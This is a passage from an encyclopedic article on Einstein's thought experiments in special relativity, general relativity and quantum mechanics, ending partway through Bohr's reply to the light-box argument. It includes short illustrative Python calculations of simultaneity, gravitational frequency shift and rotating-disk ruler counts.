say, the papers of Lorentz or Maxwell. This included his use of thought experiments. Special relativity Pursuing a beam of light Late in life, Einstein recalled this youthful thought experiment. Einstein's recollections of his musings are widely cited because of the hints they provide of his later great discovery. However, Norton has noted that Einstein's reminiscences were probably colored by a half-century of hindsight. Norton lists several problems with Einstein's recounting, both historical and scientific: 1.
At 16 years old and a student at the Gymnasium in Aarau, Einstein would have had the thought experiment in late 1895 to early 1896. But various sources note that Einstein did not learn Maxwell's theory until 1898, in university. 2. A 19th century aether theorist would have had no difficulties with the thought experiment. Einstein's statement, "...there seems to be no such thing...on the basis of experience," would not have counted as an objection, but would have represented a mere statement of fact, since no one had ever traveled at such speeds. 3. An aether theorist would have regarded "...nor according to Maxwell's equations" as simply representing a misunderstanding on Einstein's part. Unfettered by any notion that the speed of light represents a cosmic limit, the aether theorist would simply have set velocity equal to c, noted that yes indeed, the light would appear to be frozen, and then thought no more of it. Rather than the thought experiment being at all incompatible with aether theories (which it is not), the youthful Einstein appears to have reacted to the scenario out of an intuitive sense of wrongness. He felt that the laws of optics should obey the principle of relativity. As he grew older, his early thought experiment acquired deeper levels of significance: Einstein felt that Maxwell's equations should be the same for all observers in inertial motion. From Maxwell's equations, one can deduce a single speed of light, and there is nothing in this computation that depends on an observer's speed. Einstein sensed a conflict between Newtonian mechanics and the constant speed of light determined by Maxwell's equations. Regardless of the historical and scientific issues described above, Einstein's early thought experiment was part of the repertoire of test cases that he used to check on the viability of physical theories. 
Norton suggests that the real importance of the thought experiment was that it provided a powerful objection to emission theories of light, which Einstein had worked on for several years prior to 1905. Magnet and conductor In the very first paragraph of Einstein's seminal 1905 work introducing special relativity, he describes an asymmetry in the contemporary explanation of electromagnetic induction. This opening paragraph recounts well-known experimental results obtained by Michael Faraday in 1831. The experiments describe what appeared to be two different phenomena: the motional EMF generated when a wire moves through a magnetic field (see Lorentz force), and the transformer EMF generated by a changing magnetic field (due to the Maxwell–Faraday equation). James Clerk Maxwell himself drew attention to this fact in his 1861 paper On Physical Lines of Force. In the latter half of Part II of that paper, Maxwell gave a separate physical explanation for each of the two phenomena. Although Einstein calls the asymmetry "well-known", there is no evidence that any of Einstein's contemporaries considered the distinction between motional EMF and transformer EMF to be in any way odd or pointing to a lack of understanding of the underlying physics. Maxwell, for instance, had repeatedly discussed Faraday's laws of induction, stressing that the magnitude and direction of the induced current was a function only of the relative motion of the magnet and the conductor, without being bothered by the clear distinction between conductor-in-motion and magnet-in-motion in the underlying theoretical treatment. Yet Einstein's reflection on this experiment represented the decisive moment in his long and tortuous path to special relativity. Although the equations describing the two scenarios are entirely different, there is no measurement that can distinguish whether the magnet is moving, the conductor is moving, or both.
In a 1920 review on the Fundamental Ideas and Methods of the Theory of Relativity (unpublished), Einstein related how disturbing he found this asymmetry:

Einstein needed to extend the relativity of motion that he perceived between magnet and conductor in the above thought experiment to a full theory. For years, however, he did not know how this might be done. The exact path that Einstein took to resolve this issue is unknown. We do know, however, that Einstein spent several years pursuing an emission theory of light, encountering difficulties that eventually led him to give up the attempt. That decision ultimately led to his development of special relativity as a theory founded on two postulates of which he could be sure. Expressed in contemporary physics vocabulary, his postulates were as follows:

1. The laws of physics take the same form in all inertial frames.
2. In any given inertial frame, the velocity of light c is the same whether the light be emitted by a body at rest or by a body in uniform motion. [Emphasis added by editor]

Einstein's wording of the second postulate was one with which nearly all theorists of his day could agree. His wording is a far more intuitive form of the second postulate than the stronger version frequently encountered in popular writings and college textbooks.

Trains, embankments, and lightning flashes

The topic of how Einstein arrived at special relativity has been a fascinating one to many scholars: A lowly, twenty-six year old patent officer (third class), largely self-taught in physics and completely divorced from mainstream research, nevertheless in the year 1905 produced four extraordinary works (Annus Mirabilis papers), only one of which (his paper on Brownian motion) appeared related to anything that he had ever published before. Einstein's paper, On the Electrodynamics of Moving Bodies, is a polished work that bears few traces of its gestation.
Documentary evidence concerning the development of the ideas that went into it consists of, quite literally, only two sentences in a handful of preserved early letters, and various later historical remarks by Einstein himself, some of them known only second-hand and at times contradictory. In regard to the relativity of simultaneity, Einstein's 1905 paper develops the concept vividly by carefully considering the basics of how time may be disseminated through the exchange of signals between clocks. In his popular work, Relativity: The Special and General Theory, Einstein translates the formal presentation of his paper into a thought experiment using a train, a railway embankment, and lightning flashes. The essence of the thought experiment is as follows: Observer M stands on an embankment, while observer M′ rides on a rapidly traveling train. At the precise moment that M and M′ coincide in their positions, lightning strikes points A and B equidistant from M and M′. Light from these two flashes reaches M at the same time, from which M concludes that the bolts were synchronous. The combination of Einstein's first and second postulates implies that, despite the rapid motion of the train relative to the embankment, M′ measures exactly the same speed of light as does M. Since M′ was equidistant from A and B when lightning struck, the fact that M′ receives light from B before light from A means that to M′, the bolts were not synchronous. Instead, the bolt at B struck first. A routine supposition among historians of science is that, in accordance with the analysis given in his 1905 special relativity paper and in his popular writings, Einstein discovered the relativity of simultaneity by thinking about how clocks could be synchronized by light signals. The Einstein synchronization convention was originally developed by telegraphers in the mid-19th century. The dissemination of precise time was an increasingly important topic during this period.
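The train-and-embankment scenario can be made quantitative with a short sketch; all of the numbers below (train speed, strike separation) are illustrative assumptions:

```python
import math

# Hypothetical setup: in the embankment frame, lightning strikes
# A = -d and B = +d at t = 0; the train moves toward B with speed v.
c = 299_792_458.0      # m/s
v = 0.5 * c            # assumed train speed
d = 1.0e6              # m, half the distance between the strikes

# Embankment observer M at x = 0 receives both flashes together:
t_M = d / c

# The train observer, at x = 0 when the bolts strike, moves toward B,
# so the flash from B arrives before the flash from A:
t_B = d / (c + v)
t_A = d / (c - v)
assert t_B < t_M < t_A

# Lorentz transform t' = gamma * (t - v*x/c**2): events simultaneous
# on the embankment are not simultaneous on the train.
gamma = 1 / math.sqrt(1 - (v / c) ** 2)
t_A_train = gamma * (0 - v * (-d) / c**2)   # positive
t_B_train = gamma * (0 - v * (+d) / c**2)   # negative: B struck first
assert t_B_train < t_A_train
```

Both routes, the light-arrival bookkeeping and the Lorentz transform, give the same verdict: the bolt at B is earlier for the train observer.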
Trains needed accurate time to schedule use of track, cartographers needed accurate time to determine longitude, while astronomers and surveyors dared to consider the worldwide dissemination of time to accuracies of thousandths of a second. Following this line of argument, Einstein's position in the patent office, where he specialized in evaluating electromagnetic and electromechanical patents, would have exposed him to the latest developments in time technology, which would have guided him in his thoughts towards understanding the relativity of simultaneity. However, all of the above is supposition. In later recollections, when Einstein was asked about what inspired him to develop special relativity, he would mention his riding a light beam and his magnet and conductor thought experiments. He would also mention the importance of the Fizeau experiment and the observation of stellar aberration. "They were enough", he said. He never mentioned thought experiments about clocks and their synchronization. The routine analyses of the Fizeau experiment and of stellar aberration, which treat light as Newtonian corpuscles, do not require relativity. But problems arise if one considers light as waves traveling through an aether, and these problems are resolved by applying the relativity of simultaneity. It is entirely possible, therefore, that Einstein arrived at special relativity through a different path than that commonly assumed, namely through his examination of Fizeau's experiment and stellar aberration. We therefore do not know just how important clock synchronization and the train and embankment thought experiment were to Einstein's development of the concept of the relativity of simultaneity. We do know, however, that the train and embankment thought experiment was the preferred means whereby he chose to teach this concept to the general public.

Relativistic center-of-mass theorem

Einstein proposed the equivalence of mass and energy in his final Annus Mirabilis paper.
Over the next several decades, the understanding of energy and its relationship with momentum was further developed by Einstein and other physicists including Max Planck, Gilbert N. Lewis, Richard C. Tolman, Max von Laue (who in 1911 gave a comprehensive proof of E = mc² from the stress–energy tensor), and Paul Dirac (whose investigations of negative solutions in his 1928 formulation of the energy–momentum relation led to the 1930 prediction of the existence of antimatter). Einstein's relativistic center-of-mass theorem of 1906 is a case in point. In 1900, Henri Poincaré had noted a paradox in modern physics as it was then understood: When he applied well-known results of Maxwell's equations to the equality of action and reaction, he could describe a cyclic process which would result in creation of a reactionless drive, i.e. a device which could displace its center of mass without the exhaust of a propellant, in violation of the conservation of momentum. Poincaré resolved this paradox by imagining electromagnetic energy to be a fluid having a given density, which is created and destroyed with a given momentum as energy is absorbed and emitted. The motions of this fluid would oppose displacement of the center of mass in such fashion as to preserve the conservation of momentum. Einstein demonstrated that Poincaré's artifice was superfluous. Rather, he argued that mass-energy equivalence was a necessary and sufficient condition to resolve the paradox. In his demonstration, Einstein provided a derivation of mass-energy equivalence that was distinct from his original derivation. Einstein began by recasting Poincaré's abstract mathematical argument into the form of a thought experiment: Einstein considered (a) an initially stationary, closed, hollow cylinder free-floating in space, of mass M and length L, (b) with some sort of arrangement for sending a quantity of radiative energy E (a burst of photons) from the left to the right.
The radiation has momentum E/c. Since the total momentum of the system is zero, the cylinder recoils with a speed v = E/(Mc). (c) The radiation hits the other end of the cylinder in time t ≈ L/c (assuming v ≪ c), bringing the cylinder to a stop after it has moved through a distance Δx = vt = EL/(Mc²). (d) The energy deposited on the right wall of the cylinder is transferred to a massless shuttle mechanism, (e) which transports the energy to the left wall (f) and then returns to re-create the starting configuration of the system, except with the cylinder displaced to the left. The cycle may then be repeated. The reactionless drive described here violates the laws of mechanics, according to which the center of mass of a body at rest cannot be displaced in the absence of external forces. Einstein argued that the shuttle cannot be massless while transferring energy from the right to the left. If energy possesses the inertia m = E/c², the contradiction disappears. Modern analysis suggests that neither Einstein's original 1905 derivation of mass-energy equivalence nor the alternate derivation implied by his 1906 center-of-mass theorem is definitively correct. For instance, the center-of-mass thought experiment regards the cylinder as a completely rigid body. In reality, the impulse provided to the cylinder by the burst of light in step (b) cannot travel faster than light, so that when the burst of photons reaches the right wall in step (c), the wall has not yet begun to move. Ohanian has credited von Laue (1911) as having provided the first truly definitive derivation of E = mc².

Impossibility of faster-than-light signaling

In 1907, Einstein noted that from the composition law for velocities, one could deduce that there cannot exist an effect that allows faster-than-light signaling. Einstein imagined a strip of material that allows propagation of signals at the faster-than-light speed W > c (as viewed from the material strip). Imagine two observers, A and B, standing on the x-axis and separated by the distance L.
They stand next to the material strip, which is not at rest, but rather is moving in the negative x-direction with speed v. A uses the strip to send a signal to B. From the velocity composition formula, the signal propagates from A to B with speed (W - v)/(1 - Wv/c²). The time T required for the signal to propagate from A to B is given by

T = L(1 - Wv/c²)/(W - v).

The strip can move at any speed v < c. Given the starting assumption W > c, one can always set the strip moving at a speed v such that T < 0. In other words, given the existence of a means of transmitting signals faster-than-light, scenarios can be envisioned whereby the recipient of a signal will receive the signal before the transmitter has transmitted it. About this thought experiment, Einstein wrote:

General relativity

Falling painters and accelerating elevators

In his unpublished 1920 review, Einstein related the genesis of his thoughts on the equivalence principle:

The realization "startled" Einstein, and inspired him to begin an eight-year quest that led to what is considered to be his greatest work, the theory of general relativity. Over the years, the story of the falling man has become an iconic one, much embellished by other writers. In most retellings of Einstein's story, the falling man is identified as a painter. In some accounts, Einstein was inspired after he witnessed a painter falling from the roof of a building adjacent to the patent office where he worked. This version of the story leaves unanswered the question of why Einstein might consider his observation of such an unfortunate accident to represent the happiest thought in his life. Einstein later refined his thought experiment to consider a man inside a large enclosed chest or elevator falling freely in space. While in free fall, the man would consider himself weightless, and any loose objects that he emptied from his pockets would float alongside him. Then Einstein imagined a rope attached to the roof of the chamber.
A powerful "being" of some sort begins pulling on the rope with constant force. The chamber begins to move "upwards" with a uniformly accelerated motion. Within the chamber, all of the man's perceptions are consistent with his being in a uniform gravitational field. Einstein asked, "Ought we to smile at the man and say that he errs in his conclusion?" Einstein answered no. Rather, the thought experiment provided "good grounds for extending the principle of relativity to include bodies of reference which are accelerated with respect to each other, and as a result we have gained a powerful argument for a generalised postulate of relativity." Through this thought experiment, Einstein addressed an issue that was so well known, scientists rarely worried about it or considered it puzzling: Objects have "gravitational mass," which determines the force with which they are attracted to other objects. Objects also have "inertial mass," which determines the relationship between the force applied to an object and how much it accelerates. Newton had pointed out that, even though they are defined differently, gravitational mass and inertial mass always seem to be equal. But until Einstein, no one had conceived a good explanation as to why this should be so. From the correspondence revealed by his thought experiment, Einstein concluded that "it is impossible to discover by experiment whether a given system of coordinates is accelerated, or whether...the observed effects are due to a gravitational field." This correspondence between gravitational mass and inertial mass is the equivalence principle. An extension to his accelerating observer thought experiment allowed Einstein to deduce that "rays of light are propagated curvilinearly in gravitational fields."

Early applications of the equivalence principle

Einstein's formulation of special relativity was in terms of kinematics (the study of moving bodies without reference to forces).
Late in 1907, his former mathematics professor, Hermann Minkowski, presented an alternative, geometric interpretation of special relativity in a lecture to the Göttingen Mathematical Society, introducing the concept of spacetime. Einstein was initially dismissive of Minkowski's geometric interpretation, regarding it as überflüssige Gelehrsamkeit (superfluous learnedness). As with special relativity, Einstein's early results in developing what was ultimately to become general relativity were accomplished using kinematic analysis rather than geometric techniques of analysis. In his 1907 Jahrbuch paper, Einstein first addressed the question of whether the propagation of light is influenced by gravitation, and whether there is any effect of a gravitational field on clocks. In 1911, Einstein returned to this subject, in part because he had realized that certain predictions of his nascent theory were amenable to experimental test. By the time of his 1911 paper, Einstein and other scientists had offered several alternative demonstrations that the inertial mass of a body increases with its energy content: If the energy increase of the body is E, then the increase in its inertial mass is E/c². Einstein asked whether there is an increase of gravitational mass corresponding to the increase in inertial mass, and if there is such an increase, is the increase in gravitational mass precisely the same as its increase in inertial mass? Using the equivalence principle, Einstein concluded that this must be so.
To show that the equivalence principle necessarily implies the gravitation of energy, Einstein considered a light source S₂ separated along the z-axis by a distance h above a receiver S₁ in a homogeneous gravitational field having a force per unit mass of g. A certain amount of electromagnetic energy E₂ is emitted by S₂ towards S₁. According to the equivalence principle, this system is equivalent to a gravitation-free system which moves with uniform acceleration g in the direction of the positive z-axis, with S₂ separated by a constant distance h from S₁. In the accelerated system, light emitted from S₂ takes (to a first approximation) a time h/c to arrive at S₁. But in this time, the velocity of S₁ will have increased by v = gh/c from its velocity when the light was emitted. The energy arriving at S₁ will therefore not be the energy E₂ but the greater energy E₁ given by

E₁ = E₂(1 + v/c) = E₂(1 + gh/c²).

According to the equivalence principle, the same relation holds for the non-accelerated system in a gravitational field, where we replace gh by the gravitational potential difference Φ between S₂ and S₁, so that

E₁ = E₂(1 + Φ/c²).

The energy E₁ arriving at S₁ is greater than the energy E₂ emitted by S₂ by the potential energy of the mass E₂/c² in the gravitational field. Hence E/c² corresponds to the gravitational mass as well as the inertial mass of a quantity of energy E. To further clarify that the energy of gravitational mass must equal the energy of inertial mass, Einstein proposed the following cyclic process: (a) A light source S₂ is situated a distance h above a receiver S₁ in a uniform gravitational field. A movable mass m can shuttle between S₂ and S₁. (b) A pulse of electromagnetic energy E is sent from S₂ to S₁. The energy E(1 + gh/c²) is absorbed by S₁. (c) Mass m is lowered from S₂ to S₁, releasing an amount of work equal to mgh. (d) The energy absorbed by S₁ is transferred to m. This increases the gravitational mass of m to a new value m′. (e) The mass m′ is lifted back to S₂, requiring the input of work m′gh. (f) The energy carried by the mass is then transferred to S₂, completing the cycle.
Conservation of energy demands that the difference in work between raising the mass and lowering the mass, m′gh - mgh, must equal E(gh/c²), or one could potentially define a perpetual motion machine. Therefore,

m′ - m = E/c².

In other words, the increase in gravitational mass predicted by the above arguments is precisely equal to the increase in inertial mass predicted by special relativity. Einstein then considered sending a continuous electromagnetic beam of frequency ν (as measured at S₂) from S₂ to S₁ in a homogeneous gravitational field. The frequency of the light as measured at S₁ will be a larger value ν′ given by

ν′ = ν(1 + gh/c²).

Einstein noted that the above equation seemed to imply something absurd: Given that the transmission of light from S₂ to S₁ is continuous, how could the number of periods emitted per second from S₂ be different from that received at S₁? It is impossible for wave crests to appear on the way down from S₂ to S₁. The simple answer is that this question presupposes an absolute nature of time, when in fact there is nothing that compels us to assume that clocks situated at different gravitational potentials must be conceived of as going at the same rate. The principle of equivalence implies gravitational time dilation. It is important to realize that Einstein's arguments predicting gravitational time dilation are valid for any theory of gravity that respects the principle of equivalence. This includes Newtonian gravitation. Experiments such as the Pound–Rebka experiment, which have firmly established gravitational time dilation, therefore do not serve to distinguish general relativity from Newtonian gravitation. In the remainder of Einstein's 1911 paper, he discussed the bending of light rays in a gravitational field, but given the incomplete nature of Einstein's theory as it existed at the time, the value that he predicted was half the value that would later be predicted by the full theory of general relativity.
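For a sense of scale, the first-order fractional frequency shift gh/c² implied by the equivalence principle can be evaluated for a laboratory-sized height comparable to the Pound–Rebka tower; the numbers are approximate and supplied here only for illustration:

```python
# First-order gravitational frequency shift, nu' = nu * (1 + g*h/c**2).
# Height chosen to roughly match the Pound-Rebka experiment (~22.5 m);
# treat these values as illustrative approximations.
g = 9.81            # m/s^2
h = 22.5            # m
c = 299_792_458.0   # m/s

fractional_shift = g * h / c**2
print(f"{fractional_shift:.2e}")   # ~2.5e-15
```

A shift of a few parts in 10¹⁵ shows why this prediction had to wait half a century, until the Mössbauer effect, for a terrestrial test.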
Non-Euclidean geometry and the rotating disk

By 1912, Einstein had reached an impasse in his kinematic development of general relativity, realizing that he needed to go beyond the mathematics that he knew and was familiar with. Stachel has identified Einstein's analysis of the rigid relativistic rotating disk as being key to this realization. The rigid rotating disk had been a topic of lively discussion since Max Born and Paul Ehrenfest, in 1909, both presented analyses of rigid bodies in special relativity. An observer on the edge of a rotating disk experiences an apparent ("fictitious" or "pseudo") force called "centrifugal force". By 1912, Einstein had become convinced of a close relationship between gravitation and pseudo-forces such as centrifugal force: In the accompanying illustration, A represents a circular disk of 10 units diameter at rest in an inertial reference frame. The circumference of the disk is π times the diameter, and the illustration shows 31.4 rulers laid out along the circumference. B represents a circular disk of 10 units diameter that is spinning rapidly. According to a non-rotating observer, each of the rulers along the circumference is length-contracted along its line of motion. More rulers are required to cover the circumference, while the number of rulers required to span the diameter is unchanged. Note that we have not stated that we set A spinning to get B. In special relativity, it is not possible to set spinning a disk that is "rigid" in Born's sense of the term. Since spinning up disk A would cause the material to contract in the circumferential direction but not in the radial direction, a rigid disk would become fragmented from the induced stresses. In later years, Einstein repeatedly stated that consideration of the rapidly rotating disk was of "decisive importance" to him because it showed that a gravitational field causes non-Euclidean arrangements of measuring rods.
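The ruler-counting in the illustration can be sketched numerically; the rim speed below is an arbitrary assumption chosen to make the contraction visible:

```python
import math

# Disk of diameter 10 units with unit rulers laid along rim and diameter.
# For rim speed v, each circumferential ruler contracts by 1/gamma, so
# more rulers fit around the rim; radial rulers are unaffected.
c = 1.0
diameter = 10.0
v = 0.6 * c                                 # hypothetical rim speed

rulers_at_rest = math.pi * diameter         # ~31.4, as in the illustration
gamma = 1 / math.sqrt(1 - (v / c) ** 2)     # 1.25 for v = 0.6c
rulers_spinning = rulers_at_rest * gamma    # ~39.3

print(rulers_at_rest, rulers_spinning)
```

The measured ratio of circumference to diameter on the spinning disk exceeds π, which is precisely the non-Euclidean arrangement of measuring rods the paragraph describes.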
Einstein realized that he did not have the mathematical skills to describe the non-Euclidean view of space and time that he envisioned, so he turned to his mathematician friend, Marcel Grossmann, for help. After researching in the library, Grossmann found a review article by Ricci and Levi-Civita on absolute differential calculus (tensor calculus). Grossmann tutored Einstein on the subject, and in 1913 and 1914, they published two joint papers describing an initial version of a generalized theory of gravitation. Over the next several years, Einstein used these mathematical tools to generalize Minkowski's geometric approach to relativity so as to encompass curved spacetime.

Quantum mechanics

Background: Einstein and the quantum

Many myths have grown up about Einstein's relationship with quantum mechanics. Freshman physics students are aware that Einstein explained the photoelectric effect and introduced the concept of the photon. But students who have grown up with the photon may not be aware of how revolutionary the concept was for his time. The best-known factoids about Einstein's relationship with quantum mechanics are his statement, "God does not play dice with the universe" and the indisputable fact that he just did not like the theory in its final form. This has led to the general impression that, despite his initial contributions, Einstein was out of touch with quantum research and played at best a secondary role in its development. Concerning Einstein's estrangement from the general direction of physics research after 1925, his well-known scientific biographer, Abraham Pais, wrote:

In hindsight, we know that Pais was incorrect in his assessment. Einstein was arguably the greatest single contributor to the "old" quantum theory. In his 1905 paper on light quanta, Einstein created the quantum theory of light.
His proposal that light exists as tiny packets (photons) was so revolutionary, that even such major pioneers of quantum theory as Planck and Bohr refused to believe that it could be true. Bohr, in particular, was a passionate disbeliever in light quanta, and repeatedly argued against them until 1925, when he yielded in the face of overwhelming evidence for their existence. In his 1906 theory of specific heats, Einstein was the first to realize that quantized energy levels explained the specific heat of solids. In this manner, he found a rational justification for the third law of thermodynamics (i.e. the entropy of any system approaches zero as the temperature approaches absolute zero): at very cold temperatures, atoms in a solid do not have enough thermal energy to reach even the first excited quantum level, and so cannot vibrate. Einstein proposed the wave-particle duality of light. In 1909, using a rigorous fluctuation argument based on a thought experiment and drawing on his previous work on Brownian motion, he predicted the emergence of a "fusion theory" that would combine the two views. Basically, he demonstrated that the Brownian motion experienced by a mirror in thermal equilibrium with black-body radiation would be the sum of two terms, one due to the wave properties of radiation, the other due to its particulate properties. Although Planck is justly hailed as the father of quantum mechanics, his derivation of the law of black-body radiation rested on fragile ground, since it required ad hoc assumptions of an unreasonable character. Furthermore, Planck's derivation represented an analysis of classical harmonic oscillators merged with quantum assumptions in an improvised fashion. In his 1916 theory of radiation, Einstein was the first to create a purely quantum explanation. 
This paper, well known for broaching the possibility of stimulated emission (the basis of the laser), changed the nature of the evolving quantum theory by introducing the fundamental role of random chance. In 1924, Einstein received a short manuscript by an unknown Indian professor, Satyendra Nath Bose, outlining a new method of deriving the law of blackbody radiation. Einstein was intrigued by Bose's peculiar method of counting the number of distinct ways of putting photons into the available states, a method of counting that Bose apparently did not realize was unusual. Einstein, however, understood that Bose's counting method implied that photons are, in a deep sense, indistinguishable. He translated the paper into German and had it published. Einstein then followed Bose's paper with an extension to Bose's work which predicted Bose–Einstein condensation, one of the fundamental research topics of condensed matter physics. While trying to develop a mathematical theory of light which would fully encompass its wavelike and particle-like aspects, Einstein developed the concept of "ghost fields". A guiding wave obeying Maxwell's classical laws would propagate following the normal laws of optics, but would not transmit any energy. This guiding wave, however, would govern the appearance of quanta of energy on a statistical basis, so that the appearance of these quanta would be proportional to the intensity of the interference radiation. These ideas became widely known in the physics community, and through Born's work in 1926, later became a key concept in the modern quantum theory of radiation and matter. Therefore, Einstein before 1925 originated most of the key concepts of quantum theory: light quanta, wave-particle duality, the fundamental randomness of physical processes, the concept of indistinguishability, and the probability density interpretation of the wave equation. 
In addition, Einstein can arguably be considered the father of solid state physics and condensed matter physics. He provided a correct derivation of the blackbody radiation law and sparked the notion of the laser. What of the period after 1925? In 1935, working with two younger colleagues, Einstein issued a final challenge to quantum mechanics, attempting to show that it could not represent a final solution. Despite the questions raised by this paper, it made little or no difference to how physicists employed quantum mechanics in their work. Of this paper, Pais was to write:

In contrast to Pais' negative assessment, this paper, outlining the EPR paradox, has become one of the most widely cited articles in the entire physics literature. It is considered the centerpiece of the development of quantum information theory, which has been termed the "third quantum revolution."

Wave-particle duality

All of Einstein's major contributions to the old quantum theory were arrived at via statistical argument. This includes his 1905 paper arguing that light has particle properties, his 1906 work on specific heats, his 1909 introduction of the concept of wave-particle duality, his 1916 work presenting an improved derivation of the blackbody radiation formula, and his 1924 work that introduced the concept of indistinguishability. Einstein's 1909 arguments for the wave-particle duality of light were based on a thought experiment. Einstein imagined a mirror in a cavity containing particles of an ideal gas and filled with black-body radiation, with the entire system in thermal equilibrium. The mirror is constrained in its motions to a direction perpendicular to its surface. The mirror jiggles from Brownian motion due to collisions with the gas molecules. Since the mirror is in a radiation field, the moving mirror transfers some of its kinetic energy to the radiation field as a result of the difference in the radiation pressure between its forwards and reverse surfaces.
This implies that there must be fluctuations in the black-body radiation field, and hence fluctuations in the black-body radiation pressure. Reversing the argument shows that there must be a route for the return of energy from the fluctuating black-body radiation field back to the gas molecules. Given the known shape of the radiation field given by Planck's law, Einstein could calculate the mean square energy fluctuation of the black-body radiation. He found the mean square energy fluctuation ⟨ε²⟩ in a small volume v of a cavity filled with thermal radiation in the frequency interval between ν and ν + dν to be a function of frequency and temperature:

⟨ε²⟩ = hν⟨E⟩ + (c³/(8πν² v dν))⟨E⟩²,

where ⟨E⟩ would be the average energy of the volume in contact with the thermal bath. The above expression has two terms, the second corresponding to the classical Rayleigh-Jeans law (i.e. a wavelike term), and the first corresponding to the Wien distribution law (which, from Einstein's 1905 analysis, would result from point-like quanta with energy hν). From this, Einstein concluded that radiation had simultaneous wave and particle aspects.

Bubble paradox

Einstein from 1905 to 1923 was virtually the only physicist who took light-quanta seriously. Throughout most of this period, the physics community treated the light-quanta hypothesis with "skepticism bordering on derision" and maintained this attitude even after Einstein's photoelectric law was validated. The citation for Einstein's 1922 Nobel Prize very deliberately avoided all mention of light-quanta, instead stating that it was being awarded for "his services to theoretical physics and especially for his discovery of the law of the photoelectric effect". This dismissive stance contrasts sharply with the enthusiastic manner in which Einstein's other major contributions were accepted, including his work on Brownian motion, special relativity, general relativity, and his numerous other contributions to the "old" quantum theory.
Various explanations have been given for this neglect on the part of the physics community. First and foremost was wave theory's long and indisputable success in explaining purely optical phenomena. Second was the fact that his 1905 paper, which pointed out that certain phenomena would be more readily explained under the assumption that light is particulate, presented the hypothesis only as a "heuristic viewpoint". The paper offered no compelling, comprehensive alternative to existing electromagnetic theory. Third was the fact that his 1905 paper introducing light quanta and his two 1909 papers that argued for a wave-particle fusion theory approached their subjects via statistical arguments that his contemporaries "might accept as theoretical exercise—crazy, perhaps, but harmless". Most of Einstein's contemporaries adopted the position that light is ultimately a wave, but appears particulate in certain circumstances only because atoms absorb wave energy in discrete units. Among the thought experiments that Einstein presented in his 1909 lecture on the nature and constitution of radiation was one that he used to point out the implausibility of the above argument. He used this thought experiment to argue that atoms emit light as discrete particles rather than as continuous waves: (a) An electron in a cathode ray beam strikes an atom in a target. The intensity of the beam is set so low that we can consider one electron at a time as impinging on the target. (b) The atom emits a spherically radiating electromagnetic wave. (c) This wave excites an atom in a secondary target, causing it to release an electron of energy comparable to that of the original electron. The energy of the secondary electron depends only on the energy of the original electron and not at all on the distance between the primary and secondary targets. 
All the energy spread around the circumference of the radiating electromagnetic wave would appear to be instantaneously focused on the target atom, an action that Einstein considered implausible. Far more plausible would be to say that the first atom emitted a particle in the direction of the second atom. Although Einstein originally presented this thought experiment as an argument for light having a particulate nature, it has been noted that this thought experiment, which has been termed the "bubble paradox", foreshadows the famous 1935 EPR paper. In his 1927 Solvay debate with Bohr, Einstein employed this thought experiment to illustrate that according to the Copenhagen interpretation of quantum mechanics that Bohr championed, the quantum wavefunction of a particle would abruptly collapse like a "popped bubble" no matter how widely dispersed the wavefunction. The transmission of energy from opposite sides of the bubble to a single point would occur faster than light, violating the principle of locality. In the end, it was experiment, not any theoretical argument, that finally enabled the concept of the light quantum to prevail. In 1923, Arthur Compton was studying the scattering of high-energy X-rays from a graphite target. Unexpectedly, he found that the scattered X-rays were shifted in wavelength, corresponding to inelastic scattering of the X-rays by the electrons in the target. The observed shift, Δλ = (h/mₑc)(1 − cos θ), depends only on the scattering angle θ, exactly as expected for collisions between electrons and particle-like quanta carrying momentum h/λ. His observations were totally inconsistent with wave behavior, but instead could only be explained if the X-rays acted as particles. This observation of the Compton effect rapidly brought about a change in attitude, and by 1926, the concept of the "photon" was generally accepted by the physics community.

Einstein's light box

Einstein did not like the direction in which quantum mechanics had turned after 1925. Although excited by Heisenberg's matrix mechanics, Schroedinger's wave mechanics, and Born's clarification of the meaning of the Schroedinger wave equation (i.e.
that the absolute square of the wave function is to be interpreted as a probability density), his instincts told him that something was missing, a misgiving he confessed in a letter to Born.

The Solvay Debates between Bohr and Einstein began in dining-room discussions at the Fifth Solvay International Conference on Electrons and Photons in 1927. Einstein's issue with the new quantum mechanics was not just that, with the probability interpretation, it rendered invalid the notion of rigorous causality. After all, as noted above, Einstein himself had introduced random processes in his 1916 theory of radiation. Rather, by defining and delimiting the maximum amount of information obtainable in a given experimental arrangement, the Heisenberg uncertainty principle denied the existence of any knowable reality in terms of a complete specification of the momenta and description of individual particles, an objective reality that would exist whether or not we could ever observe it. Over dinner, during after-dinner discussions, and at breakfast, Einstein debated with Bohr and his followers on the question of whether quantum mechanics in its present form could be called complete. Einstein illustrated his points with increasingly clever thought experiments intended to prove that position and momentum could in principle be simultaneously known to arbitrary precision. For example, one of his thought experiments involved sending a beam of electrons through a shuttered screen, recording the positions of the electrons as they struck a photographic plate. Bohr and his allies would always be able to counter Einstein's proposal, usually by the end of the same day. On the final day of the conference, Einstein revealed that the uncertainty principle was not the only aspect of the new quantum mechanics that bothered him. Quantum mechanics, at least in the Copenhagen interpretation, appeared to allow action at a distance, the ability for two separated objects to communicate at speeds greater than light.
By 1928, the consensus was that Einstein had lost the debate, and even his closest allies during the Fifth Solvay Conference, for example Louis de Broglie, conceded that quantum mechanics appeared to be complete. At the Sixth Solvay International Conference on Magnetism (1930), Einstein came armed with a new thought experiment. This involved a box with a shutter that operated so quickly that it would allow only one photon to escape at a time. The box would first be weighed exactly. Then, at a precise moment, the shutter would open, allowing a photon to escape. The box would then be re-weighed. The well-known relationship between mass and energy would allow the energy of the particle to be precisely determined. With this gadget, Einstein believed that he had demonstrated a means to obtain, simultaneously, a precise determination of the energy of the photon as well as its exact time of departure from the system. Bohr was shaken by this thought experiment. Unable to think of a refutation, he went from one conference participant to another, trying to convince them that Einstein's thought experiment could not be true, that if it were true, it would literally mean the end of physics. After a sleepless night, he finally worked out a response which, ironically, depended on Einstein's general relativity. Consider the illustration of Einstein's light box: 1. After emitting a photon, the loss of weight causes the box to rise in the gravitational field. 2. The observer returns the box to its original height by adding weights until the pointer points to its initial position. It takes a certain amount of time for the observer to perform this procedure. How long it takes depends on the strength of the spring and on how well-damped the system is. If undamped, the box will bounce up and down forever. If over-damped, the box will return to its original position sluggishly (See Damped spring-mass system). 3. 
